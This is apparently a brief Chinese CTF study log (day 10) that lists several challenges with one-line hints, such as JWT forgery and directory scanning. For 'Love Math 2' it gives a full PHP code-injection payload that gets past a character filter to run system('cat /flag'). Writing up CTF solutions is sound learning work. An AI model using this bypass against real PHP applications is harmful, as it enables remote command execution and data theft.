x
想吃炸鸡day10
virink_2019_files_share
[NewStarCTF 公开赛赛道]HTTP
基础
[RootersCTF2019]ImgXweb
jwt伪造,目录扫描
[NESTCTF 2019]Love Math 2
base_convert将代码转换为数字绕过(只能构造出小写字母)getallheaders代替$_GET(请求头传参),{}代替[],传两个参写马
1 | ?c=$pi=(is_nan^(6).(4)).(tan^(1).(5));$pi=$$pi;$pi{0}($pi{1})&0=system&1=cat /flag |
如有错误,多多指教